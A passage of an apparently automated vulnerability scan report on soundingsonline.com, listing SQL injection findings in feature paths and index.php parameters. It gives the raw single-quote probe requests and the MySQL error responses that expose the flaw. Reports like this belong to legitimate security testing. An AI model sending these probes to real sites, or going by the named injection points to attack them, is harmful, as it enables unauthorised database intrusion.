Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:13 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /features/in-depth?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:14 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.168. http://www.soundingsonline.com/features/justyesterday [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/justyesterday

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /features/justyesterday?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:37:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:37:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /features/justyesterday?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:37:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:37:47 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.169. http://www.soundingsonline.com/features/lifestyle [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/lifestyle

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /features/lifestyle?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:37:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:37:56 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /features/lifestyle?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.170. http://www.soundingsonline.com/features/profiles [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/profiles

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /features/profiles?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:37:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:37:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /features/profiles?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:37:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:37:56 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.171. http://www.soundingsonline.com/features/technical [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/technical

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /features/technical?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:09 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /features/technical?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:12 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.172. http://www.soundingsonline.com/features/type-of-boat [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/type-of-boat

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /features/type-of-boat?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:37:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:37:56 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /features/type-of-boat?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:37:59 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.173. http://www.soundingsonline.com/index.php [Itemid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /index.php

Issue detail

The Itemid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Itemid parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:48:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:48:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111'' AND ' at line 1</font>
...[SNIP]...

Request 2

GET /index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111'' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:48:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:48:56 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.174. http://www.soundingsonline.com/index.php [chronoformname parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /index.php

Issue detail

The chronoformname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the chronoformname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /index.php?option=com_chronocontact&chronoformname=CGPage' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:46:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:46:59 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/index.php?option=com_chronocontact&chronoformname=CGPage'' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /index.php?option=com_chronocontact&chronoformname=CGPage'' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:47:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:47:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.175. http://www.soundingsonline.com/index.php [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /index.php

Issue detail

The id parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /index.php?option=com_content&view=category&layout=blog&id=98'&Itemid=111 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:48:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:48:50 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /index.php?option=com_content&view=category&layout=blog&id=98''&Itemid=111 HTTP/1.1
